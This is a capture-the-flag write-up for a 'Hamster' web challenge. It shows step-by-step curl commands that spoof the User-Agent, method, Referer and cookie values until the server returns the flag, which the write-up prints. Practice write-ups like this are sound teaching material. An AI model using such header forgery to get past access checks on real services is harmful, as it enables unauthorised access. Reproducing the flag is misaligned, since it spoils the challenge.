Recently Updated
Hamster
Challenge
The Hamster has a flag for you.
http://ch.hackyeaster.com:2301
Note: The service is restarted every hour at x:00.
Solution
We visit the url and get various responsed of how to alter our requests, so we use curl and follow instructions:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
$ curl http://ch.hackyeaster.com:2301
Howdy, I am the hamster.Please go to /feed
# ok, let's go to /feed
$ curl http://ch.hackyeaster.com:2301/feed
only hamster-agent is allowed
# so let's set a user-agent
$ curl -A "hamster-agent" http://ch.hackyeaster.com:2301/feed
⛳ GET invalid
# maybe POST? PUT? Yes, you want put
$ curl -A "hamster-agent" -X PUT http://ch.hackyeaster.com:2301/feed
🛑 request must come from hackyhamster.org
# ok, let's set a referrer
$ curl -A "hamster-agent" -X PUT -e "hackyhamster.org" http://ch.hackyeaster.com:2301/feed
🍪 brownie not found
# want a cookie? here you go.
$ curl -A "hamster-agent" -X PUT -e "hackyhamster.org" --cookie "brownie=brownie" http://ch.hackyeaster.com:2301/feed
🍪 brownie must be baked
# ok, set the value to baked
$ curl -A "hamster-agent" -X PUT -e "hackyhamster.org" --cookie "brownie=baked" http://ch.hackyeaster.com:2301/feed
🚩 he2023{s1mpl3_h34d3r_t4mp3r1ng}
#whoo, we got it!
Flag
he2023{s1mpl3_h34d3r_t4mp3r1ng}